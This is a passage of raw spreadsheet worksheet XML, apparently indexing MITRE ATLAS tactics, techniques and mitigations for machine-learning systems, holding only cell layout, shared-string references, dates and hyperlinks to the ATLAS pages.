    <hyperlink ref="E91" r:id="rId90" display="https://atlas.mitre.org/techniques/AML.T0066"/>
    <hyperlink ref="E92" r:id="rId91" display="https://atlas.mitre.org/techniques/AML.T0072"/>
    <hyperlink ref="E93" r:id="rId92" display="https://atlas.mitre.org/techniques/AML.T0004"/>
    <hyperlink ref="E94" r:id="rId93" display="https://atlas.mitre.org/techniques/AML.T0001"/>
    <hyperlink ref="E95" r:id="rId94" display="https://atlas.mitre.org/techniques/AML.T0000"/>
    <hyperlink ref="E96" r:id="rId95" display="https://atlas.mitre.org/techniques/AML.T0003"/>
    <hyperlink ref="E97" r:id="rId96" display="https://atlas.mitre.org/techniques/AML.T0008.004"/>
    <hyperlink ref="E98" r:id="rId97" display="https://atlas.mitre.org/techniques/AML.T0048.002"/>
    <hyperlink ref="E99" r:id="rId98" display="https://atlas.mitre.org/techniques/AML.T0016.001"/>
    <hyperlink ref="E100" r:id="rId99" display="https://atlas.mitre.org/techniques/AML.T0046"/>
    <hyperlink ref="E101" r:id="rId100" display="https://atlas.mitre.org/techniques/AML.T0052.000"/>
    <hyperlink ref="E102" r:id="rId101" display="https://atlas.mitre.org/techniques/AML.T0069.000"/>
    <hyperlink ref="E103" r:id="rId102" display="https://atlas.mitre.org/techniques/AML.T0079"/>
    <hyperlink ref="E104" r:id="rId103" display="https://atlas.mitre.org/techniques/AML.T0069.001"/>
    <hyperlink ref="E105" r:id="rId104" display="https://atlas.mitre.org/techniques/AML.T0069.002"/>
    <hyperlink ref="E106" r:id="rId105" display="https://atlas.mitre.org/techniques/AML.T0000.002"/>
    <hyperlink ref="E107" r:id="rId106" display="https://atlas.mitre.org/techniques/AML.T0005.000"/>
    <hyperlink ref="E108" r:id="rId107" display="https://atlas.mitre.org/techniques/AML.T0005.001"/>
    <hyperlink ref="E109" r:id="rId108" display="https://atlas.mitre.org/techniques/AML.T0011.000"/>
    <hyperlink ref="E110" r:id="rId109" display="https://atlas.mitre.org/techniques/AML.T0055"/>
    <hyperlink ref="E111" r:id="rId110" display="https://atlas.mitre.org/techniques/AML.T0005.002"/>
    <hyperlink ref="E112" r:id="rId111" display="https://atlas.mitre.org/techniques/AML.T0011"/>
    <hyperlink ref="E113" r:id="rId112" display="https://atlas.mitre.org/techniques/AML.T0048.003"/>
    <hyperlink ref="E114" r:id="rId113" display="https://atlas.mitre.org/techniques/AML.T0012"/>
    <hyperlink ref="E115" r:id="rId114" display="https://atlas.mitre.org/techniques/AML.T0042"/>
    <hyperlink ref="E116" r:id="rId115" display="https://atlas.mitre.org/techniques/AML.T0043.000"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <headerFooter/>
  <ignoredErrors>
    <ignoredError sqref="H11 H78 H62 H99 H103 H60 H29" formula="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zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <selection activeCell="A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="15" outlineLevelCol="6"/>
  <cols>
    <col min="1" max="1" width="14.4444444444444" style="21" customWidth="1"/>
    <col min="2" max="2" width="64.2222222222222" style="21" customWidth="1"/>
    <col min="3" max="3" width="22.2222222222222" style="21" customWidth="1"/>
    <col min="4" max="4" width="125.222222222222" style="22" customWidth="1"/>
    <col min="5" max="5" width="49.1111111111111" style="22" customWidth="1"/>
    <col min="6" max="6" width="12.8888888888889" style="21" customWidth="1"/>
    <col min="7" max="7" width="14" style="21" customWidth="1"/>
    <col min="8" max="16384" width="9" style="21"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7">
      <c r="A1" s="13" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="23" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="13" t="s">
        <v>797</v>
      </c>
      <c r="D1" s="13" t="s">
        <v>798</v>
      </c>
      <c r="E1" s="13" t="s">
        <v>799</v>
      </c>
      <c r="F1" s="13" t="s">
        <v>800</v>
      </c>
      <c r="G1" s="13" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="2" ht="75" spans="1:7">
      <c r="A2" s="14" t="s">
        <v>605</v>
      </c>
      <c r="B2" s="14" t="s">
        <v>606</v>
      </c>
      <c r="C2" s="14" t="s">
        <v>1034</v>
      </c>
      <c r="D2" s="15" t="s">
        <v>1035</v>
      </c>
      <c r="E2" s="16" t="s">
        <v>608</v>
      </c>
      <c r="F2" s="17">
        <v>45769</v>
      </c>
      <c r="G2" s="17">
        <v>45769</v>
      </c>
    </row>
    <row r="3" ht="135" spans="1:7">
      <c r="A3" s="14" t="s">
        <v>609</v>
      </c>
      <c r="B3" s="14" t="s">
        <v>610</v>
      </c>
      <c r="C3" s="14" t="s">
        <v>1036</v>
      </c>
      <c r="D3" s="15" t="s">
        <v>1037</v>
      </c>
      <c r="E3" s="16" t="s">
        <v>612</v>
      </c>
      <c r="F3" s="17">
        <v>45769</v>
      </c>
      <c r="G3" s="17">
        <v>45769</v>
      </c>
    </row>
    <row r="4" ht="75" spans="1:7">
      <c r="A4" s="14" t="s">
        <v>613</v>
      </c>
      <c r="B4" s="14" t="s">
        <v>614</v>
      </c>
      <c r="C4" s="14" t="s">
        <v>1038</v>
      </c>
      <c r="D4" s="15" t="s">
        <v>1039</v>
      </c>
      <c r="E4" s="16" t="s">
        <v>616</v>
      </c>
      <c r="F4" s="17">
        <v>45769</v>
      </c>
      <c r="G4" s="17">
        <v>45769</v>
      </c>
    </row>
    <row r="5" ht="75" spans="1:7">
      <c r="A5" s="14" t="s">
        <v>617</v>
      </c>
      <c r="B5" s="14" t="s">
        <v>618</v>
      </c>
      <c r="C5" s="14" t="s">
        <v>1040</v>
      </c>
      <c r="D5" s="15" t="s">
        <v>1041</v>
      </c>
      <c r="E5" s="16" t="s">
        <v>620</v>
      </c>
      <c r="F5" s="17">
        <v>45769</v>
      </c>
      <c r="G5" s="17">
        <v>45769</v>
      </c>
    </row>
    <row r="6" ht="75" spans="1:7">
      <c r="A6" s="14" t="s">
        <v>621</v>
      </c>
      <c r="B6" s="14" t="s">
        <v>622</v>
      </c>
      <c r="C6" s="19" t="s">
        <v>1042</v>
      </c>
      <c r="D6" s="15" t="s">
        <v>1043</v>
      </c>
      <c r="E6" s="16" t="s">
        <v>624</v>
      </c>
      <c r="F6" s="17">
        <v>45769</v>
      </c>
      <c r="G6" s="17">
        <v>45769</v>
      </c>
    </row>
    <row r="7" ht="60" spans="1:7">
      <c r="A7" s="14" t="s">
        <v>625</v>
      </c>
      <c r="B7" s="14" t="s">
        <v>626</v>
      </c>
      <c r="C7" s="19" t="s">
        <v>1044</v>
      </c>
      <c r="D7" s="15" t="s">
        <v>1045</v>
      </c>
      <c r="E7" s="16" t="s">
        <v>628</v>
      </c>
      <c r="F7" s="17">
        <v>45769</v>
      </c>
      <c r="G7" s="17">
        <v>45769</v>
      </c>
    </row>
    <row r="8" ht="75" spans="1:7">
      <c r="A8" s="14" t="s">
        <v>629</v>
      </c>
      <c r="B8" s="14" t="s">
        <v>630</v>
      </c>
      <c r="C8" s="19" t="s">
        <v>1046</v>
      </c>
      <c r="D8" s="15" t="s">
        <v>1047</v>
      </c>
      <c r="E8" s="16" t="s">
        <v>632</v>
      </c>
      <c r="F8" s="17">
        <v>45769</v>
      </c>
      <c r="G8" s="17">
        <v>45769</v>
      </c>
    </row>
    <row r="9" ht="75" spans="1:7">
      <c r="A9" s="14" t="s">
        <v>633</v>
      </c>
      <c r="B9" s="14" t="s">
        <v>634</v>
      </c>
      <c r="C9" s="19" t="s">
        <v>1048</v>
      </c>
      <c r="D9" s="15" t="s">
        <v>1049</v>
      </c>
      <c r="E9" s="16" t="s">
        <v>636</v>
      </c>
      <c r="F9" s="17">
        <v>45769</v>
      </c>
      <c r="G9" s="17">
        <v>45769</v>
      </c>
    </row>
    <row r="10" ht="105" spans="1:7">
      <c r="A10" s="14" t="s">
        <v>637</v>
      </c>
      <c r="B10" s="14" t="s">
        <v>638</v>
      </c>
      <c r="C10" s="14" t="s">
        <v>1050</v>
      </c>
      <c r="D10" s="15" t="s">
        <v>1051</v>
      </c>
      <c r="E10" s="16" t="s">
        <v>640</v>
      </c>
      <c r="F10" s="17">
        <v>45769</v>
      </c>
      <c r="G10" s="17">
        <v>45769</v>
      </c>
    </row>
    <row r="11" ht="75" spans="1:7">
      <c r="A11" s="14" t="s">
        <v>641</v>
      </c>
      <c r="B11" s="14" t="s">
        <v>642</v>
      </c>
      <c r="C11" s="19" t="s">
        <v>1052</v>
      </c>
      <c r="D11" s="15" t="s">
        <v>1053</v>
      </c>
      <c r="E11" s="16" t="s">
        <v>644</v>
      </c>
      <c r="F11" s="17">
        <v>45769</v>
      </c>
      <c r="G11" s="17">
        <v>45769</v>
      </c>
    </row>
    <row r="12" ht="90" spans="1:7">
      <c r="A12" s="14" t="s">
        <v>645</v>
      </c>
      <c r="B12" s="14" t="s">
        <v>646</v>
      </c>
      <c r="C12" s="19" t="s">
        <v>1054</v>
      </c>
      <c r="D12" s="15" t="s">
        <v>1055</v>
      </c>
      <c r="E12" s="16" t="s">
        <v>648</v>
      </c>
      <c r="F12" s="17">
        <v>45769</v>
      </c>
      <c r="G12" s="17">
        <v>45769</v>
      </c>
    </row>
    <row r="13" ht="75" spans="1:7">
      <c r="A13" s="14" t="s">
        <v>649</v>
      </c>
      <c r="B13" s="14" t="s">
        <v>650</v>
      </c>
      <c r="C13" s="14" t="s">
        <v>1056</v>
      </c>
      <c r="D13" s="15" t="s">
        <v>1057</v>
      </c>
      <c r="E13" s="16" t="s">
        <v>652</v>
      </c>
      <c r="F13" s="17">
        <v>45769</v>
      </c>
      <c r="G13" s="17">
        <v>45769</v>
      </c>
    </row>
    <row r="14" ht="165" spans="1:7">
      <c r="A14" s="14" t="s">
        <v>653</v>
      </c>
      <c r="B14" s="14" t="s">
        <v>654</v>
      </c>
      <c r="C14" s="14" t="s">
        <v>1058</v>
      </c>
      <c r="D14" s="15" t="s">
        <v>1059</v>
      </c>
      <c r="E14" s="16" t="s">
        <v>657</v>
      </c>
      <c r="F14" s="17">
        <v>45769</v>
      </c>
      <c r="G14" s="17">
        <v>45769</v>
      </c>
    </row>
    <row r="15" ht="90" spans="1:7">
      <c r="A15" s="14" t="s">
        <v>658</v>
      </c>
      <c r="B15" s="14" t="s">
        <v>659</v>
      </c>
      <c r="C15" s="19" t="s">
        <v>1060</v>
      </c>
      <c r="D15" s="15" t="s">
        <v>1061</v>
      </c>
      <c r="E15" s="16" t="s">
        <v>661</v>
      </c>
      <c r="F15" s="17">
        <v>45769</v>
      </c>
      <c r="G15" s="17">
        <v>45769</v>
      </c>
    </row>
    <row r="16" ht="75" spans="1:7">
      <c r="A16" s="14" t="s">
        <v>662</v>
      </c>
      <c r="B16" s="14" t="s">
        <v>663</v>
      </c>
      <c r="C16" s="19" t="s">
        <v>1062</v>
      </c>
      <c r="D16" s="15" t="s">
        <v>1063</v>
      </c>
      <c r="E16" s="16" t="s">
        <v>665</v>
      </c>
      <c r="F16" s="17">
        <v>45769</v>
      </c>
      <c r="G16" s="17">
        <v>45769</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="E2" r:id="rId1" display="https://atlas.mitre.org/tactics/AML.TA0001"/>
    <hyperlink ref="E3" r:id="rId2" display="https://atlas.mitre.org/tactics/AML.TA0000"/>
    <hyperlink ref="E4" r:id="rId3" display="https://atlas.mitre.org/tactics/AML.TA0009"/>
    <hyperlink ref="E5" r:id="rId4" display="https://atlas.mitre.org/tactics/AML.TA0014"/>
    <hyperlink ref="E6" r:id="rId5" display="https://atlas.mitre.org/tactics/AML.TA0013"/>
    <hyperlink ref="E7" r:id="rId6" display="https://atlas.mitre.org/tactics/AML.TA0007"/>
    <hyperlink ref="E8" r:id="rId7" display="https://atlas.mitre.org/tactics/AML.TA0008"/>
    <hyperlink ref="E9" r:id="rId8" display="https://atlas.mitre.org/tactics/AML.TA0005"/>
    <hyperlink ref="E10" r:id="rId9" display="https://atlas.mitre.org/tactics/AML.TA0010"/>
    <hyperlink ref="E11" r:id="rId10" display="https://atlas.mitre.org/tactics/AML.TA0011"/>
    <hyperlink ref="E12" r:id="rId11" display="https://atlas.mitre.org/tactics/AML.TA0004"/>
    <hyperlink ref="E13" r:id="rId12" display="https://atlas.mitre.org/tactics/AML.TA0006"/>
    <hyperlink ref="E14" r:id="rId13" display="https://atlas.mitre.org/tactics/AML.TA0012"/>
    <hyperlink ref="E15" r:id="rId14" display="https://atlas.mitre.org/tactics/AML.TA0002"/>
    <hyperlink ref="E16" r:id="rId15" display="https://atlas.mitre.org/tactics/AML.TA0003"/>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zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <selection activeCell="A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="15" outlineLevelCol="7"/>
  <cols>
    <col min="1" max="1" width="13.4444444444444" style="11" customWidth="1"/>
    <col min="2" max="2" width="68" style="11" customWidth="1"/>
    <col min="3" max="3" width="51.5" style="11" customWidth="1"/>
    <col min="4" max="4" width="179.777777777778" style="12" customWidth="1"/>
    <col min="5" max="5" width="52.2222222222222" style="12" customWidth="1"/>
    <col min="6" max="7" width="15.4444444444444" style="11" customWidth="1"/>
    <col min="8" max="8" width="14.5555555555556" style="11" customWidth="1"/>
    <col min="9" max="16384" width="9" style="11"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8">
      <c r="A1" s="13" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="13" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="13" t="s">
        <v>797</v>
      </c>
      <c r="D1" s="13" t="s">
        <v>798</v>
      </c>
      <c r="E1" s="13" t="s">
        <v>799</v>
      </c>
      <c r="F1" s="13" t="s">
        <v>800</v>
      </c>
      <c r="G1" s="13" t="s">
        <v>801</v>
      </c>
      <c r="H1" s="13" t="s">
        <v>1064</v>
      </c>
    </row>
    <row r="2" ht="45" spans="1:8">
      <c r="A2" s="14" t="s">
        <v>667</v>
      </c>
      <c r="B2" s="14" t="s">
        <v>668</v>
      </c>
      <c r="C2" s="14" t="s">
        <v>1065</v>
      </c>
      <c r="D2" s="15" t="s">
        <v>1066</v>
      </c>
      <c r="E2" s="16" t="s">
        <v>671</v>
      </c>
      <c r="F2" s="17">
        <v>45769</v>
      </c>
      <c r="G2" s="17">
        <v>45769</v>
      </c>
      <c r="H2" s="18"/>
    </row>
    <row r="3" ht="30" spans="1:8">
      <c r="A3" s="14" t="s">
        <v>672</v>
      </c>
      <c r="B3" s="14" t="s">
        <v>673</v>
      </c>
      <c r="C3" s="14" t="s">
        <v>1067</v>
      </c>
      <c r="D3" s="15" t="s">
        <v>1068</v>
      </c>
      <c r="E3" s="16" t="s">
        <v>676</v>
      </c>
      <c r="F3" s="17">
        <v>45769</v>
      </c>
      <c r="G3" s="17">
        <v>45769</v>
      </c>
      <c r="H3" s="18"/>
    </row>
    <row r="4" ht="45" spans="1:8">
      <c r="A4" s="14" t="s">
        <v>677</v>
      </c>
      <c r="B4" s="14" t="s">
        <v>678</v>
      </c>
      <c r="C4" s="14" t="s">
        <v>1069</v>
      </c>
      <c r="D4" s="15" t="s">
        <v>1070</v>
      </c>
      <c r="E4" s="16" t="s">
        <v>681</v>
      </c>
      <c r="F4" s="17">
        <v>45769</v>
      </c>
      <c r="G4" s="17">
        <v>45769</v>
      </c>
      <c r="H4" s="18"/>
    </row>
    <row r="5" ht="30" spans="1:8">
      <c r="A5" s="14" t="s">
        <v>682</v>
      </c>
      <c r="B5" s="14" t="s">
        <v>683</v>
      </c>
      <c r="C5" s="14" t="s">
        <v>1071</v>
      </c>
      <c r="D5" s="15" t="s">
        <v>1072</v>
      </c>
      <c r="E5" s="16" t="s">
        <v>686</v>
      </c>
      <c r="F5" s="17">
        <v>45769</v>
      </c>
      <c r="G5" s="17">
        <v>45769</v>
      </c>
      <c r="H5" s="18"/>
    </row>
    <row r="6" ht="30" spans="1:8">
      <c r="A6" s="14" t="s">
        <v>687</v>
      </c>
      <c r="B6" s="14" t="s">
        <v>688</v>
      </c>
      <c r="C6" s="14" t="s">
        <v>1073</v>
      </c>
      <c r="D6" s="15" t="s">
        <v>1074</v>
      </c>
      <c r="E6" s="16" t="s">
        <v>691</v>
      </c>
      <c r="F6" s="17">
        <v>45769</v>
      </c>
      <c r="G6" s="17">
        <v>45769</v>
      </c>
      <c r="H6" s="18"/>
    </row>
    <row r="7" spans="1:8">
      <c r="A7" s="14" t="s">
        <v>692</v>
      </c>
      <c r="B7" s="14" t="s">
        <v>693</v>
      </c>
      <c r="C7" s="19" t="s">
        <v>1075</v>
      </c>
      <c r="D7" s="15" t="s">
        <v>1076</v>
      </c>
      <c r="E7" s="16" t="s">
        <v>696</v>
      </c>
      <c r="F7" s="17">
        <v>45769</v>
      </c>
      <c r="G7" s="17">
        <v>45769</v>
      </c>
      <c r="H7" s="18"/>
    </row>
    <row r="8" spans="1:8">
      <c r="A8" s="14" t="s">
        <v>697</v>
      </c>
      <c r="B8" s="14" t="s">
        <v>698</v>
      </c>
      <c r="C8" s="19" t="s">
        <v>1077</v>
      </c>
      <c r="D8" s="15" t="s">
        <v>1078</v>
      </c>
      <c r="E8" s="16" t="s">
        <v>701</v>
      </c>
      <c r="F8" s="17">
        <v>45769</v>
      </c>
      <c r="G8" s="17">
        <v>45769</v>
      </c>
      <c r="H8" s="18"/>
    </row>
    <row r="9" spans="1:8">
      <c r="A9" s="14" t="s">
        <v>702</v>
      </c>
      <c r="B9" s="14" t="s">
        <v>703</v>
      </c>
      <c r="C9" s="19" t="s">
        <v>1079</v>
      </c>
      <c r="D9" s="15" t="s">
        <v>1080</v>
      </c>
      <c r="E9" s="16" t="s">
        <v>706</v>
      </c>
      <c r="F9" s="17">
        <v>45769</v>
      </c>
      <c r="G9" s="17">
        <v>45769</v>
      </c>
      <c r="H9" s="18"/>
    </row>
    <row r="10" ht="45" spans="1:8">
      <c r="A10" s="14" t="s">
        <v>707</v>
      </c>
      <c r="B10" s="14" t="s">
        <v>708</v>
      </c>
      <c r="C10" s="14" t="s">
        <v>1081</v>
      </c>
      <c r="D10" s="15" t="s">
        <v>1082</v>
      </c>
      <c r="E10" s="16" t="s">
        <v>711</v>
      </c>
      <c r="F10" s="17">
        <v>45769</v>
      </c>
      <c r="G10" s="17">
        <v>45769</v>
      </c>
      <c r="H10" s="18"/>
    </row>
    <row r="11" ht="60" spans="1:8">
      <c r="A11" s="14" t="s">
        <v>712</v>
      </c>
      <c r="B11" s="14" t="s">
        <v>713</v>
      </c>
      <c r="C11" s="14" t="s">
        <v>1083</v>
      </c>
      <c r="D11" s="15" t="s">
        <v>1084</v>
      </c>
      <c r="E11" s="16" t="s">
        <v>716</v>
      </c>
      <c r="F11" s="17">
        <v>45769</v>
      </c>
      <c r="G11" s="17">
        <v>45769</v>
      </c>
      <c r="H11" s="18"/>
    </row>
    <row r="12" ht="60" spans="1:8">
      <c r="A12" s="14" t="s">
        <v>717</v>
      </c>
      <c r="B12" s="14" t="s">
        <v>718</v>
      </c>
      <c r="C12" s="14" t="s">
        <v>1085</v>
      </c>
      <c r="D12" s="15" t="s">
        <v>1086</v>
      </c>
      <c r="E12" s="20" t="s">
        <v>721</v>
      </c>
      <c r="F12" s="17">
        <v>45769</v>
      </c>
      <c r="G12" s="17">
        <v>45769</v>
      </c>
      <c r="H12" s="18"/>
    </row>
    <row r="13" spans="1:8">
      <c r="A13" s="14" t="s">
        <v>722</v>
      </c>
      <c r="B13" s="14" t="s">
        <v>723</v>
      </c>
      <c r="C13" s="19" t="s">
        <v>1087</v>
      </c>
      <c r="D13" s="15" t="s">
        <v>1088</v>
      </c>
      <c r="E13" s="16" t="s">
        <v>726</v>
      </c>
      <c r="F13" s="17">
        <v>45769</v>
      </c>
      <c r="G13" s="17">
        <v>45769</v>
      </c>
      <c r="H13" s="18"/>
    </row>
    <row r="14" spans="1:8">
      <c r="A14" s="14" t="s">
        <v>727</v>
      </c>
      <c r="B14" s="14" t="s">
        <v>728</v>
      </c>
      <c r="C14" s="19" t="s">
        <v>1089</v>
      </c>
      <c r="D14" s="15" t="s">
        <v>1090</v>
      </c>
      <c r="E14" s="20" t="s">
        <v>731</v>
      </c>
      <c r="F14" s="17">
        <v>45769</v>
      </c>
      <c r="G14" s="17">
        <v>45769</v>
      </c>
      <c r="H14" s="18"/>
    </row>
    <row r="15" ht="30" spans="1:8">
      <c r="A15" s="14" t="s">
        <v>732</v>
      </c>
      <c r="B15" s="14" t="s">
        <v>733</v>
      </c>
      <c r="C15" s="19" t="s">
        <v>1091</v>
      </c>
      <c r="D15" s="15" t="s">
        <v>1092</v>
      </c>
      <c r="E15" s="16" t="s">
        <v>736</v>
      </c>
      <c r="F15" s="17">
        <v>45769</v>
      </c>
      <c r="G15" s="17">
        <v>45769</v>
      </c>
      <c r="H15" s="18"/>
    </row>
    <row r="16" spans="1:8">
      <c r="A16" s="14" t="s">
        <v>737</v>
      </c>
      <c r="B16" s="14" t="s">
        <v>738</v>
      </c>
      <c r="C16" s="14" t="s">
        <v>1093</v>
      </c>
      <c r="D16" s="15" t="s">
        <v>1094</v>
      </c>
      <c r="E16" s="16" t="s">
        <v>741</v>
      </c>
      <c r="F16" s="17">
        <v>45769</v>
      </c>
      <c r="G16" s="17">
        <v>45769</v>
      </c>
      <c r="H16" s="18"/>
    </row>
    <row r="17" spans="1:8">
      <c r="A17" s="14" t="s">
        <v>742</v>
      </c>
      <c r="B17" s="14" t="s">
        <v>743</v>
      </c>
      <c r="C17" s="14" t="s">
        <v>1095</v>
      </c>
      <c r="D17" s="15" t="s">
        <v>1096</v>
      </c>
      <c r="E17" s="16" t="s">
        <v>746</v>
      </c>
      <c r="F17" s="17">
        <v>45769</v>
      </c>
      <c r="G17" s="17">
        <v>45769</v>
      </c>
      <c r="H17" s="18"/>
    </row>
    <row r="18" spans="1:8">
      <c r="A18" s="14" t="s">
        <v>747</v>
      </c>
      <c r="B18" s="14" t="s">
        <v>748</v>
      </c>
      <c r="C18" s="14" t="s">
        <v>1097</v>
      </c>
      <c r="D18" s="15" t="s">
        <v>1098</v>
      </c>
      <c r="E18" s="16" t="s">
        <v>751</v>
      </c>
      <c r="F18" s="17">
        <v>45769</v>
      </c>
      <c r="G18" s="17">
        <v>45769</v>
      </c>
      <c r="H18" s="18"/>
    </row>
    <row r="19" ht="73" customHeight="1" spans="1:8">
      <c r="A19" s="14" t="s">
        <v>752</v>
      </c>
      <c r="B19" s="14" t="s">
        <v>753</v>
      </c>
      <c r="C19" s="19" t="s">
        <v>1099</v>
      </c>
      <c r="D19" s="15" t="s">
        <v>1100</v>
      </c>
      <c r="E19" s="16" t="s">
        <v>756</v>
      </c>
      <c r="F19" s="17">
        <v>45769</v>
      </c>
      <c r="G19" s="17">
        <v>45769</v>
      </c>
      <c r="H19" s="18"/>
    </row>
    <row r="20" ht="30" spans="1:8">
      <c r="A20" s="14" t="s">
        <v>757</v>
      </c>
      <c r="B20" s="14" t="s">
        <v>758</v>
      </c>
      <c r="C20" s="19" t="s">
        <v>1101</v>
      </c>
      <c r="D20" s="15" t="s">
        <v>1102</v>
      </c>
      <c r="E20" s="16" t="s">
        <v>761</v>
      </c>
      <c r="F20" s="17">
        <v>45769</v>
      </c>
      <c r="G20" s="17">
        <v>45769</v>
      </c>
      <c r="H20" s="18"/>
    </row>
    <row r="21" ht="60" spans="1:8">
      <c r="A21" s="14" t="s">
        <v>762</v>
      </c>
      <c r="B21" s="14" t="s">
        <v>763</v>
      </c>
      <c r="C21" s="19" t="s">
        <v>1103</v>
      </c>
      <c r="D21" s="15" t="s">
        <v>1104</v>
      </c>
      <c r="E21" s="16" t="s">
        <v>766</v>
      </c>
      <c r="F21" s="17">
        <v>45769</v>
      </c>
      <c r="G21" s="17">
        <v>45769</v>
      </c>
      <c r="H21" s="18"/>
    </row>
    <row r="22" spans="1:8">
      <c r="A22" s="14" t="s">
        <v>767</v>
      </c>
      <c r="B22" s="14" t="s">
        <v>768</v>
      </c>
      <c r="C22" s="19" t="s">
        <v>1105</v>
      </c>
      <c r="D22" s="15" t="s">
        <v>1106</v>
      </c>
      <c r="E22" s="20" t="s">
        <v>771</v>
      </c>
      <c r="F22" s="17">
        <v>45769</v>
      </c>
      <c r="G22" s="17">
        <v>45769</v>
      </c>
      <c r="H22" s="18"/>
    </row>
    <row r="23" spans="1:8">
      <c r="A23" s="14" t="s">
        <v>772</v>
      </c>
      <c r="B23" s="14" t="s">
        <v>773</v>
      </c>
      <c r="C23" s="19" t="s">
        <v>1107</v>
      </c>
      <c r="D23" s="15" t="s">
        <v>1108</v>
      </c>
      <c r="E23" s="20" t="s">
        <v>776</v>
      </c>
      <c r="F23" s="17">
        <v>45769</v>
      </c>
      <c r="G23" s="17">
        <v>45769</v>
      </c>
      <c r="H23" s="18"/>
    </row>
    <row r="24" spans="1:8">
      <c r="A24" s="14" t="s">
        <v>777</v>
      </c>
      <c r="B24" s="14" t="s">
        <v>778</v>
      </c>
      <c r="C24" s="19" t="s">
        <v>1109</v>
      </c>
      <c r="D24" s="15" t="s">
        <v>1110</v>
      </c>
      <c r="E24" s="20" t="s">
        <v>781</v>
      </c>
      <c r="F24" s="17">
        <v>45769</v>
      </c>
      <c r="G24" s="17">
        <v>45769</v>
      </c>
      <c r="H24" s="18"/>
    </row>
    <row r="25" spans="1:8">
      <c r="A25" s="14" t="s">
        <v>782</v>
      </c>
      <c r="B25" s="14" t="s">
        <v>783</v>
      </c>
      <c r="C25" s="19" t="s">
        <v>1111</v>
      </c>
      <c r="D25" s="15" t="s">
        <v>1112</v>
      </c>
      <c r="E25" s="16" t="s">
        <v>786</v>
      </c>
      <c r="F25" s="17">
        <v>45769</v>
      </c>
      <c r="G25" s="17">
        <v>45769</v>
      </c>
      <c r="H25" s="18"/>
    </row>
    <row r="26" spans="1:8">
      <c r="A26" s="14" t="s">
        <v>787</v>
      </c>
      <c r="B26" s="14" t="s">
        <v>788</v>
      </c>
      <c r="C26" s="19" t="s">
        <v>1113</v>
      </c>
      <c r="D26" s="15" t="s">
        <v>1114</v>
      </c>
      <c r="E26" s="16" t="s">
        <v>791</v>
      </c>
      <c r="F26" s="17">
        <v>45769</v>
      </c>
      <c r="G26" s="17">
        <v>45769</v>
      </c>
      <c r="H26" s="18"/>
    </row>
    <row r="27" ht="75" spans="1:8">
      <c r="A27" s="14" t="s">
        <v>792</v>
      </c>
      <c r="B27" s="14" t="s">
        <v>793</v>
      </c>
      <c r="C27" s="19" t="s">
        <v>1115</v>
      </c>
      <c r="D27" s="15" t="s">
        <v>1116</v>
      </c>
      <c r="E27" s="16" t="s">
        <v>796</v>
      </c>
      <c r="F27" s="17">
        <v>45769</v>
      </c>
      <c r="G27" s="17">
        <v>45769</v>
      </c>
      <c r="H27" s="18"/>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="E2" r:id="rId1" display="https://atlas.mitre.org/mitigations/AML.M0023"/>
    <hyperlink ref="E3" r:id="rId2" display="https://atlas.mitre.org/mitigations/AML.M0017"/>
    <hyperlink ref="E4" r:id="rId3" display="https://atlas.mitre.org/mitigations/AML.M0024"/>
    <hyperlink ref="E5" r:id="rId4" display="https://atlas.mitre.org/mitigations/AML.M0015"/>
    <hyperlink ref="E6" r:id="rId5" display="https://atlas.mitre.org/mitigations/AML.M0013"/>
    <hyperlink ref="E7" r:id="rId6" display="https://atlas.mitre.org/mitigations/AML.M0005"/>
    <hyperlink ref="E8" r:id="rId7" display="https://atlas.mitre.org/mitigations/AML.M0019"/>
    <hyperlink ref="E9" r:id="rId8" display="https://atlas.mitre.org/mitigations/AML.M0012"/>
    <hyperlink ref="E10" r:id="rId9" display="https://atlas.mitre.org/mitigations/AML.M0020"/>
    <hyperlink ref="E11" r:id="rId10" display="https://atlas.mitre.org/mitigations/AML.M0021"/>
    <hyperlink ref="E12" r:id="rId11" display="https://atlas.mitre.org/mitigations/AML.M0022"/>
    <hyperlink ref="E13" r:id="rId12" display="https://atlas.mitre.org/mitigations/AML.M0010"/>
    <hyperlink ref="E14" r:id="rId13" display="https://atlas.mitre.org/mitigations/AML.M0001"/>
    <hyperlink ref="E15" r:id="rId14" display="https://atlas.mitre.org/mitigations/AML.M0000"/>
    <hyperlink ref="E16" r:id="rId15" display="https://atlas.mitre.org/mitigations/AML.M0025"/>
    <hyperlink ref="E17" r:id="rId16" display="https://atlas.mitre.org/mitigations/AML.M0003"/>
    <hyperlink ref="E18" r:id="rId17" display="https://atlas.mitre.org/mitigations/AML.M0002"/>
    <hyperlink ref="E19" r:id="rId18" display="https://atlas.mitre.org/mitigations/AML.M0011"/>
    <hyperlink ref="E20" r:id="rId19" display="https://atlas.mitre.org/mitigations/AML.M0004"/>
    <hyperlink ref="E21" r:id="rId20" display="https://atlas.mitre.org/mitigations/AML.M0007"/>
    <hyperlink ref="E22" r:id="rId21" display="https://atlas.mitre.org/mitigations/AML.M0006"/>
    <hyperlink ref="E23" r:id="rId22" display="https://atlas.mitre.org/mitigations/AML.M0009"/>
    <hyperlink ref="E24" r:id="rId23" display="https://atlas.mitre.org/mitigations/AML.M0018"/>
    <hyperlink ref="E25" r:id="rId24" display="https://atlas.mitre.org/mitigations/AML.M0008"/>
    <hyperlink ref="E26" r:id="rId25" display="https://atlas.mitre.org/mitigations/AML.M0014"/>
    <hyperlink ref="E27" r:id="rId26" display="https://atlas.mitre.org/mitigations/AML.M0016"/>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workbookViewId="0">
      <selection activeCell="A1" sqref="A1:B1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.4"/>
  <cols>
